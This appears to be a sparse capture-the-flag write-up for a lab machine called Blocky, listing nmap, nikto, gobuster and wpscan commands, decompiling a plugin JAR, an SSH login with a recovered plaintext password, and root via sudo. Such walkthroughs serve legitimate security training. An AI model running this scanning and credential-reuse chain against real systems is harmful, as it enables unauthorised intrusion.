echo "10.129.1.53 haircut.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.1.53 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210320181520.png

nmap -sC -sV -O -p- -oA blocky 10.129.1.53

Pasted image 20210320135902.png

nmap -sU -O -p- -oA blocky-udp 10.129.1.53

nikto -h 10.129.1.53:80 Pasted image 20210320183105.png

gobuster dir -k -u http://10.129.1.53/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
Pasted image 20210320183326.png

Pasted image 20210320181817.png

jar xf BlockyCore.jar cd com/myfirstplugin javap -v BlockyCore.class

Pasted image 20210320182459.png

wpscan --url http://blocky.htb -e u

Pasted image 20210320182923.png

Pasted image 20210320182953.png

ssh notch@10.129.1.53 y password: 8YsqfCTnvxAUeduzjNSXe22 Pasted image 20210320183911.png

sudo -l sudo su

Pasted image 20210320184222.png

https://www.exploit-db.com/exploits/44298

boxes

copyright©2022 Cu3rv0x all rights reserved